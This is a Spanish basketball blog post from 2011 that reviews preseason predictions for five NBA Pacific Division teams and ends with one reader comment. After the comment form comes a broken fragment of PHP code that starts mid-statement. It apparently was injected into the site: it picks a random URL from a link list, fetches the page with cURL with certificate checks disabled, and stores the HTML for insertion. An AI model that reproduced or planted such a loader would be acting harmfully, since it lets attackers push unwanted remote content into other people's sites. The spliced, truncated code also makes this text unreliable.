Revisando pronósticos 2011: Pacific

04 de February de 2011 por Viva_Dirk

LOS ANGELES LAKERS

Prónostico Septiembre 2010: Campeón
Probabilidad de acierto:
Media
Calificación pronóstico:
C
Análisis

No cabe duda de que después de 2 anillos consecutivos puede aparecer la relajación durante la regular season pero el actual balance de los campeones tiene una progresión menor de 50 victorias, algo a todas luces impropio de un candidato al anillo. Los Lakers deben ir a más según se acerquen los play-offs si realmente quieren aspirar a todo. Ya han perdido de forma casi definitiva la ventaja de campo contra rivales como San Antonio o Boston y no pueden permitirse más despistes.

Kobe Bryant, Pau Gasol y Lamar Odom tienen unos números envidiables, algo que no se está reflejando en el número de victorias por falta de actitud en demasiados encuentros. A Bynum, como cada año por esta fecha, se le espera sano en play-offs. De conseguirlo sería sin duda una excelente noticia para las veteranas estrellas amarillas. A Fisher no se le espera hasta dentro de 3 meses y la temporada de Ron Artest es lamentable. La segunda unidad formada por Blake, Brown y Barnes ha perdido chispa con el paso de los partidos y la lesión del alero, pero también debe recuperar su nivel de inicio de curso para poner a su equipo donde se le espera.

PHOENIX SUNS

Pronóstico Septiembre 2010: 1ª ronda de play-offs
Probabilidad de acierto:
Media
Calificación del pronóstico:
C
Análisis

Como no podía ser de otro modo, en septiembre centrábamos todas nuestras miradas en Steve Nash y hoy por hoy podemos afirmar con rotundidad que no nos ha decepcionado. A su alrededor sigue fluyendo todo su equipo y su nivel sigue siendo salvajemente alto.  Los traspasos que ha realizado Phoenix están empezando a acoplarse en el equipo. Actualmente están cerca de la 8ª plaza del Oeste que ocupa Portland y viendo los precedentes de años anteriores estamos seguros de que los Suns estarán ahí hasta el final, esperando cualquier tropiezo de sus rivales para colarse una año mas en play-offs.

Al poco de comenzar la temporada Jason Richarson y Hedo Turkoglu dejaron la franquicia para que aterrizaran en ella Vince Carter y Marcin Gortat, como principales protagonistas del traspaso. Las diferencias entra Richardson y Carter son escasas. Seguramente Richardson ofrecía una mayor implicación y algo más de constancia pero no se puede decir que hayan perdido demasiado por ahí.  Pero sin duda la versión que dejaron marchar de Turkoglu es mucho peor que lo que está mostrando el polaco que en los 10 últimos partidos promedia 12.7 puntos, 9.4 rebotes y excelentes porcentajes de tiro, aportando seriedad y trabajo en ambas zonas. Eso, al lado de Nash, se convierte en algo muy peligroso para los contrarios. Tanto Grant Hill como Channing Frye siguen con su buen hacer y la segunda unidad con Dragic, Warrick y Dudley a la cabeza aporta intensidad y calidad.

No les da para más, pero Nash lleva haciendo de este tipo de equipos, un rival muy peligroso para cualquiera demasiado tiempo como para subestimarlos.

GOLDEN STATE WARRIORS

Pronóstico Septiembre 2010: Fuera de play-offs, en torno a 35 victorias.
Probabilidad de acierto:
Total
Calificación pronóstico:
A+
Análisis

El balance actual de los Warriors es de 20-27. Si haceis una regla de 3 veréis que su progresión es de 35 victorias clavadas, como si ya hubiese visto nuestro analista lo que iba a pasar. Y es que si ahora mismo nos preguntan quien es el entrenador de este equipo, la inmensa mayoria no tendríamos ni idea sin consultarlo. Diga lo que diga la wikipedia este equipo siguen siendo los Warriors de Don Nelson, un equipo que anota 103 puntos por noche y recibe 106, aunque  la rotación sea mucho más reconocible que la del año pasado.

Cuentan a nivel individual con un anotador puro como Monta Ellis, un base con recursos ofensivos casi ilimitados como Stephen Curry, a un currante de primer nivel como David Lee, están disfrutando de la mejor temporada de la carrera de Dorrell Wright y de un Andris Biedrins que sería titular en muchos equipos de play-offs pero simplemente son un equipo al que nadie toma en serio, con una defensa inexistente y unos recursos pésimamente utilizados.

El rumbo que quieren dar los dirigentes a la franquicia es un misterio para el resto de mortales.

LOS ANGELES CLIPPERS

Pronóstico Septiembre 2010: Peleando play-offs y quedandose fuera.
Probabilidad de acierto:
Baja
Calificación pronóstico:
C-
Análisis

De un tiempo a esta parte me pregunto como se las van a arreglar en esta peculiar franquicia para cagarla. Quizá este próximo el hecho que provoque que un equipo con Blake Griffin, Eric Gordon, Baron Davis, Chris Kaman(o lo que saque por él), DeAndre Jordan y un montón de dinero para gastar en el verano de 2012 vaya a convertirse en un equipo perdedor. Es algo que sin duda solo podrían conseguir los Clippers y su maldición eterna.

La temporada tiene el dato negativo de la lesión durante todo el año de Chris Kaman, el cual podría, o más bien debería, convertirse en moneda de cambio para llevar al equipo un alero que complete un tremendo quinteto. Al margen de esto no hay calificativo para describir lo que ha supuesto para la franquicia la aparición de Blake Griffin. Las comparaciones se han disparado y nos es para menos puesto que ningun rookie conseguia tales números desde Tim Duncan. También excelente la temporada de Eric Gordon en todos los niveles y la reciente aparición de DeAndre Jordan deja en manos de los dirigentes cerrar un equipo que incluso consiga motivar al 100% a Baron Davis, algo que desgraciadamente nunca han sido capaces de hacer.

En las manos adecuadas estaríamos hablando del equipo con mayor potencial de la liga, con todo para pelearse con los mas grandes por las cotas mas altas. Veremos cual es la realidad.

SACRAMENTO KINGS

Pronóstico Septiembre 2010: Fuera de play-offs
Probabilidad de acierto:
Total
Calificación pronóstico:
B+
Análisis

Temporada algo decepcionante en lo que ha resultados se refiere de los Kings. Sus seguidores no deben estar precisamente preocupados pues sabían de ante mano que se trataba de un año de transición pero aun así no cabe duda de que esperaban estar más cerca del grupo que pelea por entrar en la post-temporada. Como siempre en la vida hay que verle el lado positivo a las cosas, y es que una nueva elección en el top5 del draft para los Kings podría suponer un salto cualitativo importante, unido a los casi 30 millones que tienen para ofrecer a los agentes libres en verano.

La decepción se personifica en la temporada de Tyreke Evans, repleta de problemas físicos, concretamente un fascitis plantar que parece estar mermando seriamente al que fuera rookie del año. La lesión no nos está permitiendo ver el impacto real que puede tener la pareja formada por Evans y Cousins, ahora que el novato parece haberle tomado la medida a la competición y completando grandes actuaciones. Al margen de la parejita tenemos buenas temporadas de correctos jugadores. Udrih y Landry entran en el perfil de lo que necesita cualquier equipo, pero no son armas de suficiente calibre para afrontar cotas mayores.

Imágenes | AP-Photos / Getty Images

Comenta

Un comentario a esta entrada

  1. David dice:
    #1

    Estos Clippers… que será de ellos dentro de tres años.
    Puede ser brutal, espero que de una vez por todas se rompa la maldición, un crack como Blake Griffin bien lo merece.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>